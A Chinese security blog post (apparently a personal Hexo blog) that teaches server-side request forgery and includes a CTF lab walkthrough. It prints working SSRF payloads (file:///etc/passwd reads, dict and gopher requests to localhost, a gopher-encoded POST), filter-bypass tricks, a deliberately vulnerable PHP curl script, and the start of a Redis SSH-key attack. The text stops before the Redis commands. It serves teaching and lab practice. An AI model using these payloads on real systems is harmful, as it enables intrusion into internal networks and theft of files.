<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">






















<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">

<link rel="stylesheet" href="/css/main.css?v=7.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.2.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.2.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.2.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="1. SSRF漏洞1.1 漏洞简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。 1.2 漏洞原理 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如，通过控制前台的请求远程地址加载的响应，来让请求数据由远程的URL域名修改为请求本地、或者内网的IP">
<meta property="og:type" content="article">
<meta property="og:title" content="SSRF实战攻防">
<meta property="og:url" content="http://yoursite.com/2019/10/17/SSRF实战攻防/index.html">
<meta property="og:site_name" content="菜鸟博客">
<meta property="og:description" content="1. SSRF漏洞1.1 漏洞简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。 1.2 漏洞原理 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如，通过控制前台的请求远程地址加载的响应，来让请求数据由远程的URL域名修改为请求本地、或者内网的IP">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143041-59c04d34-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143042-5a578c80-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143042-5acbbb78-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143043-5b220ae6-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143044-5b6ebb70-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143044-5bbc8b02-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143045-5c08d0fc-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143045-5c4d2e1e-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143046-5ca3c27e-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143046-5d0cebc8-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143047-5d6857c4-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143047-5dbfebb0-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143048-5e0f7cd4-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143048-5e62cf10-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143049-5ecc68da-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143050-5f135e66-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143050-5f6338be-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143051-5fa53c50-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143100-6540d21e-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143101-658e8810-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143101-65e2a206-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143102-663805ac-ce14-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143102-668750d0-ce14-1.png">
<meta property="og:updated_time" content="2019-10-17T15:33:51.814Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SSRF实战攻防">
<meta name="twitter:description" content="1. SSRF漏洞1.1 漏洞简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。 1.2 漏洞原理 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如，通过控制前台的请求远程地址加载的响应，来让请求数据由远程的URL域名修改为请求本地、或者内网的IP">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190903143041-59c04d34-ce14-1.png">





  
  
  <link rel="canonical" href="http://yoursite.com/2019/10/17/SSRF实战攻防/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>SSRF实战攻防 | 菜鸟博客</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">菜鸟博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/17/SSRF实战攻防/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="VegyChick">
      <meta itemprop="description" content="沉迷渗透测试的信安菜鸟">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="菜鸟博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SSRF实战攻防

              
            
          </h1>
        

        <div class="post-meta">

          
          
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-10-17 23:32:21 / 修改时间：23:33:51" itemprop="dateCreated datePublished" datetime="2019-10-17T23:32:21+08:00">2019-10-17</time>
            </span>
          

          
            

            
          

          

          
            
            
          

          
          

          

          <br>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="1-SSRF漏洞"><a href="#1-SSRF漏洞" class="headerlink" title="1. SSRF漏洞"></a>1. SSRF漏洞</h1><h2 id="1-1-漏洞简介"><a href="#1-1-漏洞简介" class="headerlink" title="1.1 漏洞简介"></a>1.1 漏洞简介</h2><p> SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。</p>
<h2 id="1-2-漏洞原理"><a href="#1-2-漏洞原理" class="headerlink" title="1.2 漏洞原理"></a>1.2 漏洞原理</h2><p> 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如，通过控制前台的请求远程地址加载的响应，来让请求数据由远程的URL域名修改为请求本地、或者内网的IP地址及服务，来造成对内网系统的攻击。</p>
<h2 id="1-3-漏洞危害"><a href="#1-3-漏洞危害" class="headerlink" title="1.3 漏洞危害"></a>1.3 漏洞危害</h2><h3 id="1-3-1-扫描内网开放服务"><a href="#1-3-1-扫描内网开放服务" class="headerlink" title="1.3.1 扫描内网开放服务"></a>1.3.1 扫描内网开放服务</h3><h3 id="1-3-2-向内部任意主机的任意端口发送payload来攻击内网服务"><a href="#1-3-2-向内部任意主机的任意端口发送payload来攻击内网服务" class="headerlink" title="1.3.2 向内部任意主机的任意端口发送payload来攻击内网服务"></a>1.3.2 向内部任意主机的任意端口发送payload来攻击内网服务</h3><h3 id="1-3-3-DOS攻击（请求大文件，始终保持连接Keep-Alive-Always）"><a href="#1-3-3-DOS攻击（请求大文件，始终保持连接Keep-Alive-Always）" class="headerlink" title="1.3.3 DOS攻击（请求大文件，始终保持连接Keep-Alive Always）"></a>1.3.3 DOS攻击（请求大文件，始终保持连接Keep-Alive Always）</h3><h3 id="1-3-4-攻击内网的web应用，例如直接SQL注入、XSS攻击等"><a href="#1-3-4-攻击内网的web应用，例如直接SQL注入、XSS攻击等" class="headerlink" title="1.3.4 攻击内网的web应用，例如直接SQL注入、XSS攻击等"></a>1.3.4 攻击内网的web应用，例如直接SQL注入、XSS攻击等</h3><h3 id="1-3-5-利用file、gopher、dict协议读取本地文件、执行命令等"><a href="#1-3-5-利用file、gopher、dict协议读取本地文件、执行命令等" class="headerlink" title="1.3.5 利用file、gopher、dict协议读取本地文件、执行命令等"></a>1.3.5 利用file、gopher、dict协议读取本地文件、执行命令等</h3><h1 id="2-检测与绕过"><a href="#2-检测与绕过" class="headerlink" title="2. 检测与绕过"></a>2. 检测与绕过</h1><h2 id="2-1-漏洞检测"><a href="#2-1-漏洞检测" class="headerlink" title="2.1 漏洞检测"></a>2.1 漏洞检测</h2><p>假设一个漏洞场景：某网站有一个在线加载功能可以把指定的远程图片加载到本地，功能链接如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.xxx.com/image.php?image=http://www.xxc.com/a.jpg</span><br></pre></td></tr></table></figure>

<p>那么网站请求的大概步骤应该是类似以下：</p>
<p>用户输入图片地址-&gt;请求发送到服务端解析-&gt;服务端请求链接地址的图片数据-&gt;获取请求的数据加载到前台显示。</p>
<p>这个过程中可能出现问题的点就在于请求发送到服务端的时候，系统没有效验前台给定的参数是不是允许访问的地址域名，例如，如上的链接可以修改为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.xxx.com/image.php?image=http://127.0.0.1:22</span><br></pre></td></tr></table></figure>

<p>如上请求时则可能返回请求的端口banner。如果协议允许，甚至可以使用其他协议来读取和执行相关命令。例如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://www.xxx.com/image.php?image=file:///etc/passwd</span><br><span class="line">http://www.xxx.com/image.php?image=dict://127.0.0.1:22/data:data2 (dict可以向服务端口请求data data2)</span><br><span class="line">http://www.xxx.com/image.php?image=gopher://127.0.0.1:2233/_test (向2233端口发送数据test,同样可以发送POST请求)</span><br><span class="line">......</span><br></pre></td></tr></table></figure>

<p>对于不同语言实现的web系统可以使用的协议也存在不同的差异，其中：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">php:</span><br><span class="line">http、https、file、gopher、phar、dict、ftp、ssh、telnet...</span><br><span class="line">java:</span><br><span class="line">http、https、file、ftp、jar、netdoc、mailto...</span><br></pre></td></tr></table></figure>

<p>判断漏洞是否存在的重要前提是，请求的服务器发起的，以上链接即使存在并不一定代表这个请求是服务器发起的。因此前提不满足的情况下，SSRF是不必要考虑的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.xxx.com/image.php?image=http://www.xxc.com/a.jpg</span><br></pre></td></tr></table></figure>

<p>链接获取后，是由js来获取对应参数交由window.location来处理相关的请求，或者加载到当前的iframe框架中，此时并不存在SSRF ，因为请求是本地发起，并不能产生攻击服务端内网的需求。</p>
<h2 id="2-2-漏洞出现点"><a href="#2-2-漏洞出现点" class="headerlink" title="2.2 漏洞出现点"></a>2.2 漏洞出现点</h2><h3 id="2-2-1-分享"><a href="#2-2-1-分享" class="headerlink" title="2.2.1 分享"></a>2.2.1 分享</h3><p>通过url 地址分享文章，例如如下地址：</p>
<p><a href="http://share.xxx.com/index.php?url=http://127.0.0.1" target="_blank" rel="noopener">http://share.xxx.com/index.php?url=http://127.0.0.1</a></p>
<p>通过url参数的获取来实现点击链接的时候跳到指定的分享文章。如果在此功能中没有对目标地址的范围做过滤与限制则就存在着SSRF漏洞。</p>
<h3 id="2-2-2-图片加载与下载"><a href="#2-2-2-图片加载与下载" class="headerlink" title="2.2.2 图片加载与下载"></a>2.2.2 图片加载与下载</h3><p>通过URL地址加载或下载图片</p>
<p><a href="http://image.xxx.com/image.php?image=http://127.0.0.1" target="_blank" rel="noopener">http://image.xxx.com/image.php?image=http://127.0.0.1</a></p>
<p>图片加载存在于很多的编辑器中，编辑器上传图片处，有的是加载远程图片到服务器内。还有一些采用了加载远程图片的形式，本地文章加载了设定好的远程图片服务器上的图片地址，如果没对加载的参数做限制可能造成SSRF。</p>
<h3 id="2-2-3-图片、文章收藏功能"><a href="#2-2-3-图片、文章收藏功能" class="headerlink" title="2.2.3 图片、文章收藏功能"></a>2.2.3 图片、文章收藏功能</h3><p><a href="http://title.xxx.com/title?title=http://title.xxx.com/as52ps63de" target="_blank" rel="noopener">http://title.xxx.com/title?title=http://title.xxx.com/as52ps63de</a></p>
<p>例如title参数是文章的标题地址，代表了一个文章的地址链接，请求后返回文章是否保存，收藏的返回信息。如果保存，收藏功能采用了此种形式保存文章，则在没有限制参数的形式下可能存在SSRF。</p>
<h3 id="2-2-4-利用参数中的关键字来查找"><a href="#2-2-4-利用参数中的关键字来查找" class="headerlink" title="2.2.4 利用参数中的关键字来查找"></a>2.2.4 利用参数中的关键字来查找</h3><p>例如以下的关键字：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">share</span><br><span class="line">wap</span><br><span class="line">url</span><br><span class="line">link</span><br><span class="line">src</span><br><span class="line">source</span><br><span class="line">target</span><br><span class="line">u</span><br><span class="line">3g</span><br><span class="line">display</span><br><span class="line">sourceURl</span><br><span class="line">imageURL</span><br><span class="line">domain</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<h2 id="2-3-漏洞绕过"><a href="#2-3-漏洞绕过" class="headerlink" title="2.3 漏洞绕过"></a>2.3 漏洞绕过</h2><p>部分存在漏洞，或者可能产生SSRF的功能中做了白名单或者黑名单的处理，来达到阻止对内网服务和资源的攻击和访问。因此想要达到SSRF的攻击，需要对请求的参数地址做相关的绕过处理，常见的绕过方式如下：</p>
<h3 id="2-3-1-限制为http-www-xxx-com-域名时"><a href="#2-3-1-限制为http-www-xxx-com-域名时" class="headerlink" title="2.3.1 限制为http://www.xxx.com 域名时"></a>2.3.1 限制为<a href="http://www.xxx.com/" target="_blank" rel="noopener">http://www.xxx.com</a> 域名时</h3><p>可以尝试采用http基本身份认证的方式绕过，<a href="http://www.xxx.com@www.xxc.com./" target="_blank" rel="noopener">http://www.xxx.com@www.xxc.com。</a><br>在对@解析域名中，不同的处理函数存在处理差异，例如：<br><a href="http://www.aaa.com%40www.bbb.com@www.ccc.xn--com%2Cphpparse_urlwww-lx83ah6kp7u060a900oqcpe.ccc.xn--com%2Clibcurlwww-bx7vp49b0iau304e5tvb.bbb.com./" target="_blank" rel="noopener">http://www.aaa.com@www.bbb.com@www.ccc.com，在PHP的parse_url中会识别www.ccc.com，而libcurl则识别为www.bbb.com。</a></p>
<h3 id="2-3-2-限制请求IP不为内网地址"><a href="#2-3-2-限制请求IP不为内网地址" class="headerlink" title="2.3.2 限制请求IP不为内网地址"></a>2.3.2 限制请求IP不为内网地址</h3><p>采用短网址绕过，比如百度短地址<a href="https://dwz.cn/。" target="_blank" rel="noopener">https://dwz.cn/。</a><br>采用可以指向任意域名的xip.io，127.0.0.1.xip.io，可以解析为127.0.0.1<br>采用进制转换，127.0.0.1八进制：0177.0.0.1。十六进制：0x7f.0.0.1。十进制：2130706433</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143041-59c04d34-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143041-59c04d34-ce14-1.png" alt="img"></a></p>
<h3 id="2-3-3-限制请求只为http协议"><a href="#2-3-3-限制请求只为http协议" class="headerlink" title="2.3.3 限制请求只为http协议"></a>2.3.3 限制请求只为http协议</h3><p>采用302跳转，百度短地址，或者使用<a href="https://tinyurl.xn--com302-u20k9dv69h8r7bzc7cjyd.xn--:-mo6a99b62wez8a/" target="_blank" rel="noopener">https://tinyurl.com生成302跳转地址。使用如下：</a></p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143042-5a578c80-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143042-5a578c80-ce14-1.png" alt="img"></a></p>
<h3 id="2-3-4-其他"><a href="#2-3-4-其他" class="headerlink" title="2.3.4 其他"></a>2.3.4 其他</h3><p>其他绕过形式可以查看：<a href="https://www.secpulse.com/archives/65832.html" target="_blank" rel="noopener">https://www.secpulse.com/archives/65832.html</a></p>
<h1 id="3-测试方法"><a href="#3-测试方法" class="headerlink" title="3. 测试方法"></a>3. 测试方法</h1><h2 id="3-1-漏洞环境"><a href="#3-1-漏洞环境" class="headerlink" title="3.1 漏洞环境"></a>3.1 漏洞环境</h2><p>PHP脚本、Windows</p>
<h2 id="3-2-利用工具"><a href="#3-2-利用工具" class="headerlink" title="3.2 利用工具"></a>3.2 利用工具</h2><p>bash、nc</p>
<h2 id="3-3-测试过程"><a href="#3-3-测试过程" class="headerlink" title="3.3 测试过程"></a>3.3 测试过程</h2><p>首先采用如下脚本创建一个PHP的服务端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?PHP</span><br><span class="line">$ch = curl_init(); </span><br><span class="line">curl_setopt($ch, CURLOPT_URL, $_GET[&apos;url&apos;]); </span><br><span class="line">#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);</span><br><span class="line">curl_setopt($ch, CURLOPT_HEADER, 0); </span><br><span class="line">#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);</span><br><span class="line">curl_exec($ch); </span><br><span class="line">curl_close($ch);  </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>开启PHP的web环境，访问<a href="http://localhost/ssrf.php?url=，页面显示正常即可。在一个bash中开启监听端口，来模仿即将被SSRF到的内网服务，此处采用nc。" target="_blank" rel="noopener">http://localhost/ssrf.php?url=，页面显示正常即可。在一个bash中开启监听端口，来模仿即将被SSRF到的内网服务，此处采用nc。</a></p>
<p>浏览器访问如下链接：<code>http://localhost/ssrf.php?url=http://127.0.0.1:2233</code>。监听端可以看到来自localhost的请求，请求目标为127.0.0.1的2233端口。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143042-5acbbb78-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143042-5acbbb78-ce14-1.png" alt="img"></a></p>
<p>使用gopher协议来查看协议，访问：<code>http://localhost/ssrf.php?url=gopher://127.0.0.1:2233/_test</code></p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143043-5b220ae6-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143043-5b220ae6-ce14-1.png" alt="img"></a></p>
<p>利用gopher发送POST的请求，访问：<code>http://localhost/ssrf.php?url=gopher://127.0.0.1:2233/_POST%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20127.0.0.1%3A2233%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250a%250d%250ausername%3Dadmin%26password%3Dpassword</code></p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143044-5b6ebb70-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143044-5b6ebb70-ce14-1.png" alt="img"></a></p>
<p>以上方式简单的展示了SSRF的攻击过程和请求，下面我们使用回显形SSRF。</p>
<p>漏洞环境：Ubuntu 18、 docker 、PHP、Apache</p>
<p>漏洞文件地址：<a href="https://github.com/nikosdano/SSRF-Vulnerable-with-Curl" target="_blank" rel="noopener">https://github.com/nikosdano/SSRF-Vulnerable-with-Curl</a></p>
<p>下载文件放入apache服务器中，访问<a href="http://192.168.120.132/awesome_script.php" target="_blank" rel="noopener">http://192.168.120.132/awesome_script.php</a></p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143044-5bbc8b02-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143044-5bbc8b02-ce14-1.png" alt="img"></a></p>
<p>在其中我们可以填写想要执行的SSRF命令，如填写<code>file:///etc/passwd</code>，回显为：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143045-5c08d0fc-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143045-5c08d0fc-ce14-1.png" alt="img"></a></p>
<p>尝试端口探测，对22端口进行探测是否开启：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143045-5c4d2e1e-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143045-5c4d2e1e-ce14-1.png" alt="img"></a></p>
<p>截至到此，相信对SSRF已经有了一个简单认识和检测，下面我们利用一个靶场来模拟一个完整的真实的SSRF攻击。</p>
<h1 id="4-实战演示"><a href="#4-实战演示" class="headerlink" title="4. 实战演示"></a>4. 实战演示</h1><h2 id="4-1-漏洞环境"><a href="#4-1-漏洞环境" class="headerlink" title="4.1 漏洞环境"></a>4.1 漏洞环境</h2><p>Rootme CTF all the day</p>
<h2 id="4-2-漏洞地址"><a href="#4-2-漏洞地址" class="headerlink" title="4.2 漏洞地址"></a>4.2 漏洞地址</h2><p><a href="https://www.root-me.org/en/Capture-The-Flag/CTF-all-the-day/" target="_blank" rel="noopener">https://www.root-me.org/en/Capture-The-Flag/CTF-all-the-day/</a></p>
<h2 id="4-3-利用工具"><a href="#4-3-利用工具" class="headerlink" title="4.3 利用工具"></a>4.3 利用工具</h2><p>Burp</p>
<h2 id="4-4-漏洞介绍"><a href="#4-4-漏洞介绍" class="headerlink" title="4.4 漏洞介绍"></a>4.4 漏洞介绍</h2><p>SSRF+redis 获取内网主机权限，利用SSRF来对redis的未授权访问执行命令。从而达到获取主机权限的目的</p>
<h2 id="4-5-测试过程"><a href="#4-5-测试过程" class="headerlink" title="4.5 测试过程"></a>4.5 测试过程</h2><p>访问目标地址，如果没有账号，需要创建账号点击右上的绿色小加号来创建账号，创建完成后回到此页面。</p>
<p>找到一个处于none的虚拟机，点击房间名，如下的ctf04</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143046-5ca3c27e-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143046-5ca3c27e-ce14-1.png" alt="img"></a></p>
<p>进入房间后，选择需要创建的虚拟机，选择SSRF Box，点击保存，选择start the game。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143046-5d0cebc8-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143046-5d0cebc8-ce14-1.png" alt="img"></a></p>
<p>过一段时间的等待后，会显示如下信息。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143047-5d6857c4-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143047-5d6857c4-ce14-1.png" alt="img"></a></p>
<p>访问 ctf04.root-me.org 就可以看到启动的虚拟环境了</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143047-5dbfebb0-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143047-5dbfebb0-ce14-1.png" alt="img"></a></p>
<p>当然，如果在创建虚拟机之前，看到其他的房间有人已经创建了SSRF Box我们也可以加入此玩家的房间，点击房间名，进入房间后点击右上角的Join the game。稍等片刻就可以加入到游戏中，根据提示访问对应的地址就可以开始测试啦。</p>
<p>访问地址后可以看到页面显示一个输入框，需要输入url参数，开始抓包。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143048-5e0f7cd4-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143048-5e0f7cd4-ce14-1.png" alt="img"></a></p>
<p>尝试在页面输入百度地址后，页面会把百度首页加载进此页面中。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143048-5e62cf10-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143048-5e62cf10-ce14-1.png" alt="img"></a></p>
<p>读取系统文件：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143049-5ecc68da-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143049-5ecc68da-ce14-1.png" alt="img"></a></p>
<p>使用burp的Intruder模块，来探测开放的服务端口，开放则显示OK，不开放则显示Connection refused。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143050-5f135e66-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143050-5f135e66-ce14-1.png" alt="img"></a></p>
<p>探测可知内网开放了6379端口redis服务，尝试利用SSRF对redis执行未授权漏洞，此处简单科普一下redis漏洞影响。</p>
<p>详细内容可以查看文章：<a href="https://www.freebuf.com/vuls/162035.html" target="_blank" rel="noopener">https://www.freebuf.com/vuls/162035.html</a></p>
<p>Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。</p>
<p>因此，此漏洞在没有配置密码的情况下可以利用SSRF来绕过绑定在本地的限制，从而实现在外网攻击内网应用。</p>
<p>1）利用redis来写ssh密钥</p>
<p>此处利用ssh生成一对公私钥，生成的默认文件为id_rsa.pub和id_rsa。把id_rsa.pub上传至服务器即可。我们利用redis把目录设置为ssh目录下：</p>
